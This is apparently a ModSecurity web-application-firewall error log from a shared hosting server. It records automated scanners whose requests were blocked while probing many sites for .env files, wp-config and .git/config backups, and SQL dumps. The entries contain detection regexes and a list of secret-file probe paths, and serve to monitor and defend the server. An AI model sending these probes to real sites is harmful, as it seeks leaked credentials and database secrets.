[Tue May 26 14:48:52.912066 2026] [security2:error] [pid 648203:tid 648346] [client 45.148.10.5:27814] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.landsonlogistics.com.onesoft.in"] [uri "/src/.env"] [unique_id "ahVlfLEQDDtxJNiDrdTfegAAAJI"]
[Tue May 26 14:48:52.935873 2026] [security2:error] [pid 648203:tid 648244] [remote 195.178.110.199:55984] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-config\\\\.php(?:\\\\W[a-z]*|bak)" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "300"] [id "900256"] [msg "Wp-Config Backup/edit file request"] [hostname "www.landsonlogistics.com"] [uri "/wp-config.php.bak"] [unique_id "ahVlfLEQDDtxJNiDrdTffwABAig"]
[Tue May 26 14:48:52.936257 2026] [security2:error] [pid 648203:tid 648280] [remote 195.178.110.199:55984] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.landsonlogistics.com"] [uri "/website/.env"] [unique_id "ahVlfLEQDDtxJNiDrdTffQABAkw"]
[Tue May 26 14:48:52.936798 2026] [security2:error] [pid 648203:tid 648236] [remote 195.178.110.199:55984] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 199.110.178.195.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.landsonlogistics.com"] [uri "/wp-config.php"] [unique_id "ahVlfLEQDDtxJNiDrdTfgAABAiA"]
[Tue May 26 14:48:52.936863 2026] [security2:error] [pid 648203:tid 648218] [remote 195.178.110.199:55984] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-config\\\\.php(?:\\\\W[a-z]*|bak)" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "300"] [id "900256"] [msg "Wp-Config Backup/edit file request"] [hostname "www.landsonlogistics.com"] [uri "/wp-config.php.new"] [unique_id "ahVlfLEQDDtxJNiDrdTfgQABAg4"]
[Tue May 26 14:48:52.937395 2026] [security2:error] [pid 648203:tid 648226] [remote 195.178.110.199:55984] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-config\\\\.php(?:\\\\W[a-z]*|bak)" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "300"] [id "900256"] [msg "Wp-Config Backup/edit file request"] [hostname "www.landsonlogistics.com"] [uri "/wp-config.php.old"] [unique_id "ahVlfLEQDDtxJNiDrdTfggABAhY"]
[Tue May 26 14:48:52.953732 2026] [security2:error] [pid 648203:tid 648257] [remote 195.178.110.199:55984] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.sql$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1288"] [id "350590"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access raw SQL files (disable this rule if you require access to files that end with .sql)"] [severity "CRITICAL"] [hostname "www.landsonlogistics.com"] [uri "/wp-content/mysql.sql"] [unique_id "ahVlfLEQDDtxJNiDrdTfhwAA0DU"]
[Tue May 26 14:48:52.986706 2026] [security2:error] [pid 648203:tid 648349] [client 176.65.139.231:46944] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.rethinkinclusion.org.thedebateafrica.org"] [uri "/.env"] [unique_id "ahVlfLEQDDtxJNiDrdTfigAAAJU"]
[Tue May 26 14:48:52.986812 2026] [security2:error] [pid 648203:tid 648449] [client 176.65.139.231:46958] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "finclass.africa.thedebateafrica.org"] [uri "/.env"] [unique_id "ahVlfLEQDDtxJNiDrdTfiwAAAPk"]
[Tue May 26 14:48:53.036392 2026] [security2:error] [pid 648203:tid 648374] [client 176.65.139.236:45504] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.crusties.thedebateafrica.org"] [uri "/.env"] [unique_id "ahVlfbEQDDtxJNiDrdTfjAAAAK4"]
[Tue May 26 14:48:53.047947 2026] [security2:error] [pid 648203:tid 648411] [client 74.249.173.207:27845] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 207.173.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.xn--seordeanimas-bhb.com.md-74.webhostbox.net"] [uri "/function/function.php"] [unique_id "ahVlfbEQDDtxJNiDrdTfjwAAANM"]
[Tue May 26 14:48:53.108572 2026] [security2:error] [pid 648203:tid 648406] [client 195.178.110.199:60302] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.landsonlogistics.com"] [uri "/.env"] [unique_id "ahVlfbEQDDtxJNiDrdTfkQAAAM4"]
[Tue May 26 14:48:53.133003 2026] [security2:error] [pid 648203:tid 648335] [client 176.65.139.231:46974] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.workrepublic.thedebateafrica.org"] [uri "/.env"] [unique_id "ahVlfbEQDDtxJNiDrdTfkwAAAIc"]
[Tue May 26 14:48:53.153177 2026] [security2:error] [pid 648203:tid 648459] [client 176.65.139.239:64528] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.couplesspot.thedebateafrica.org"] [uri "/.env"] [unique_id "ahVlfbEQDDtxJNiDrdTfmAAAAQM"]
[Tue May 26 14:48:53.154201 2026] [security2:error] [pid 648203:tid 648351] [client 176.65.139.232:19890] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.herbalplus.thedebateafrica.org"] [uri "/.env"] [unique_id "ahVlfbEQDDtxJNiDrdTfmgAAAJc"]
[Tue May 26 14:48:53.157260 2026] [security2:error] [pid 648203:tid 648424] [client 176.65.139.235:26852] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.agsnails.com.thedebateafrica.org"] [uri "/.env"] [unique_id "ahVlfbEQDDtxJNiDrdTfnAAAAOA"]
[Tue May 26 14:48:53.170078 2026] [security2:error] [pid 648203:tid 648423] [client 176.65.139.233:55938] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.landmark.thedebateafrica.org"] [uri "/.env"] [unique_id "ahVlfbEQDDtxJNiDrdTfnQAAAN8"]
[Tue May 26 14:48:53.231387 2026] [security2:error] [pid 648203:tid 648358] [client 195.178.110.199:60358] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(\\\\/\\\\*\\\\!? ?(?:select|grant|delete|insert|drop|alter|replace|truncate|update|create|rename|describe|union|concat|group_concat))" at REQUEST_FILENAME. [file "/opt/mod_security/hg_rules.conf"] [line "1019"] [id "9000042"] [rev "2.2.2"] [msg "SQL Comment Sequence Detected."] [data "/*update"] [hostname "www.landsonlogistics.com"] [uri "/*update.cgi*"] [unique_id "ahVlfbEQDDtxJNiDrdTfpAAAAJ4"]
[Tue May 26 14:48:53.291936 2026] [security2:error] [pid 648203:tid 648448] [client 195.178.110.199:60304] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.landsonlogistics.com"] [uri "/.docker/.env"] [unique_id "ahVlfbEQDDtxJNiDrdTfqgAAAPg"]
[Tue May 26 14:48:53.375841 2026] [security2:error] [pid 648203:tid 648433] [client 195.178.110.199:60352] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.landsonlogistics.com"] [uri "/.docker/laravel/app/.env"] [unique_id "ahVlfbEQDDtxJNiDrdTfrgAAAOk"]
[Tue May 26 14:48:53.379775 2026] [security2:error] [pid 648203:tid 648384] [client 195.178.110.199:60358] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.landsonlogistics.com"] [uri "/.env"] [unique_id "ahVlfbEQDDtxJNiDrdTfsAAAALg"]
[Tue May 26 14:48:53.429271 2026] [security2:error] [pid 648203:tid 648412] [client 176.65.139.229:64460] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "tedxnutm.org.ng.thedebateafrica.org"] [uri "/.env"] [unique_id "ahVlfbEQDDtxJNiDrdTftAAAANQ"]
[Tue May 26 14:48:53.434293 2026] [security2:error] [pid 648203:tid 648418] [client 195.178.110.199:60372] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.landsonlogistics.com"] [uri "/backend/.env"] [unique_id "ahVlfbEQDDtxJNiDrdTftwAAANo"]
[Tue May 26 14:48:53.443386 2026] [security2:error] [pid 648203:tid 648355] [client 195.178.110.199:60304] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.backup$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1279"] [id "390588"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .backup)"] [severity "CRITICAL"] [hostname "www.landsonlogistics.com"] [uri "/.env.backup"] [unique_id "ahVlfbEQDDtxJNiDrdTfuQAAAJs"]
[Tue May 26 14:48:53.865784 2026] [security2:error] [pid 648203:tid 648411] [client 195.178.110.199:60318] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "www.landsonlogistics.com"] [uri "/.env.bak"] [unique_id "ahVlfbEQDDtxJNiDrdTf4AAAANM"]
[Tue May 26 14:48:54.033365 2026] [security2:error] [pid 648203:tid 648398] [client 57.141.2.19:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVlfbEQDDtxJNiDrdTfyQAAAMY"]
[Tue May 26 14:48:54.156200 2026] [security2:error] [pid 648203:tid 648445] [client 195.178.110.199:60292] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.old$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1263"] [id "390583"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .old)"] [severity "CRITICAL"] [hostname "www.landsonlogistics.com"] [uri "/.env.old"] [unique_id "ahVlfrEQDDtxJNiDrdTf7wAAAPU"]
[Tue May 26 14:48:54.192506 2026] [security2:error] [pid 648203:tid 648450] [client 195.178.110.199:60358] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 199.110.178.195.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.landsonlogistics.com"] [uri "/.env.php"] [unique_id "ahVlfrEQDDtxJNiDrdTf8wAAAPo"]
[Tue May 26 14:48:54.306959 2026] [security2:error] [pid 648203:tid 648388] [client 176.65.139.233:55944] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.newnigeria.thedebateafrica.org"] [uri "/.env"] [unique_id "ahVlfrEQDDtxJNiDrdTf-QAAALw"]
[Tue May 26 14:48:54.310973 2026] [security2:error] [pid 648203:tid 648436] [client 195.178.110.199:60318] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.sw[a-z]$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1275"] [id "390587"] [rev "5"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .sw)"] [severity "CRITICAL"] [hostname "www.landsonlogistics.com"] [uri "/.env.swp"] [unique_id "ahVlfrEQDDtxJNiDrdTf-wAAAOw"]
[Tue May 26 14:48:54.378480 2026] [security2:error] [pid 648203:tid 648438] [client 195.178.110.199:60420] ModSecurity: Access denied with code 406 (phase 2). Pattern match "[a-z0-9]~$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1257"] [id "390581"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data Leakage - attempt to access backup file (disable this rule if you require access to files that end with a tilde)"] [severity "CRITICAL"] [hostname "www.landsonlogistics.com"] [uri "/.env~"] [unique_id "ahVlfrEQDDtxJNiDrdTgAAAAAO4"]
[Tue May 26 14:48:54.566478 2026] [security2:error] [pid 648203:tid 648357] [client 195.178.110.199:60334] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(wp-)?config\\\\.(php\\\\.)?(?:bac?k|o(?:ld|rig)|copy|s(?:ave|wp)|vim?\\\\.|~)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1254"] [id "390597"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data Leakage - attempt to access backup config file (disable this rule if you require access to these backup files)"] [severity "CRITICAL"] [hostname "www.landsonlogistics.com"] [uri "/.git/config.old"] [unique_id "ahVlfrEQDDtxJNiDrdTgFQAAAJ0"]
[Tue May 26 14:48:54.572922 2026] [security2:error] [pid 648203:tid 648392] [client 209.50.161.215:43403] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "155"] [id "900406"] [msg "wp-login POST logging"] [data "200"] [hostname "velanstore.ca"] [uri "/wp-login.php"] [unique_id "ahVlfbEQDDtxJNiDrdTfwAAAAMA"], referer: https://velanstore.ca/wp-login.php
[Tue May 26 14:48:54.844428 2026] [security2:error] [pid 648203:tid 648424] [client 195.178.110.199:60438] ModSecurity: Access denied with code 406 (phase 2). Pattern match "[a-z0-9]~$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1257"] [id "390581"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data Leakage - attempt to access backup file (disable this rule if you require access to files that end with a tilde)"] [severity "CRITICAL"] [hostname "www.landsonlogistics.com"] [uri "/.git/config~"] [unique_id "ahVlfrEQDDtxJNiDrdTgJwAAAOA"]
[Tue May 26 14:48:54.959376 2026] [security2:error] [pid 648203:tid 648354] [client 195.178.110.199:60292] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(wp-)?config\\\\.(php\\\\.)?(?:bac?k|o(?:ld|rig)|copy|s(?:ave|wp)|vim?\\\\.|~)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1254"] [id "390597"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data Leakage - attempt to access backup config file (disable this rule if you require access to these backup files)"] [severity "CRITICAL"] [hostname "www.landsonlogistics.com"] [uri "/.git/config.bak"] [unique_id "ahVlfrEQDDtxJNiDrdTgLgAAAJo"]
[Tue May 26 14:48:55.010531 2026] [security2:error] [pid 648203:tid 648444] [client 176.65.139.236:45524] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "agsnails.com"] [uri "/.env"] [unique_id "ahVlf7EQDDtxJNiDrdTgNAAAAPQ"]
[Tue May 26 14:48:55.051990 2026] [security2:error] [pid 648203:tid 648391] [client 176.65.139.229:64470] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "ameritradeng.com"] [uri "/.env"] [unique_id "ahVlf7EQDDtxJNiDrdTgOwAAAL8"]
[Tue May 26 14:48:55.112583 2026] [security2:error] [pid 648203:tid 648445] [client 176.65.139.233:55960] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "strapptech.com"] [uri "/.env"] [unique_id "ahVlf7EQDDtxJNiDrdTgQwAAAPU"]
[Tue May 26 14:48:55.112650 2026] [security2:error] [pid 648203:tid 648405] [client 165.140.119.146:50789] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 146.119.140.165.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.bloggertarget.com"] [uri "/wp-comments-post.php"] [unique_id "ahVlfrEQDDtxJNiDrdTgMAAAAM0"], referer: https://www.bloggertarget.com
[Tue May 26 14:48:55.112781 2026] [security2:error] [pid 648203:tid 648405] [client 165.140.119.146:50789] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "147"] [id "900404"] [msg "wp-comments-post POST logging"] [data "409"] [hostname "www.bloggertarget.com"] [uri "/wp-comments-post.php"] [unique_id "ahVlfrEQDDtxJNiDrdTgMAAAAM0"], referer: https://www.bloggertarget.com
[Tue May 26 14:48:55.818454 2026] [security2:error] [pid 648203:tid 648395] [client 45.148.10.5:27814] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.landsonlogistics.com.onesoft.in"] [uri "/backend/.env"] [unique_id "ahVlf7EQDDtxJNiDrdTgeQAAAMM"]
[Tue May 26 14:48:55.903494 2026] [security2:error] [pid 648203:tid 648370] [client 176.65.139.231:46980] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "tedxnutm.org.ng"] [uri "/.env"] [unique_id "ahVlf7EQDDtxJNiDrdTggAAAAKo"]
[Tue May 26 14:48:55.928044 2026] [security2:error] [pid 648203:tid 648354] [client 176.65.139.229:64486] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.osanctus.org.thedebateafrica.org"] [uri "/.env"] [unique_id "ahVlf7EQDDtxJNiDrdTgggAAAJo"]
[Tue May 26 14:48:56.178926 2026] [security2:error] [pid 648203:tid 648343] [client 195.178.110.199:60334] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.landsonlogistics.com"] [uri "/API/.env"] [unique_id "ahVlgLEQDDtxJNiDrdTgjwAAAI8"]
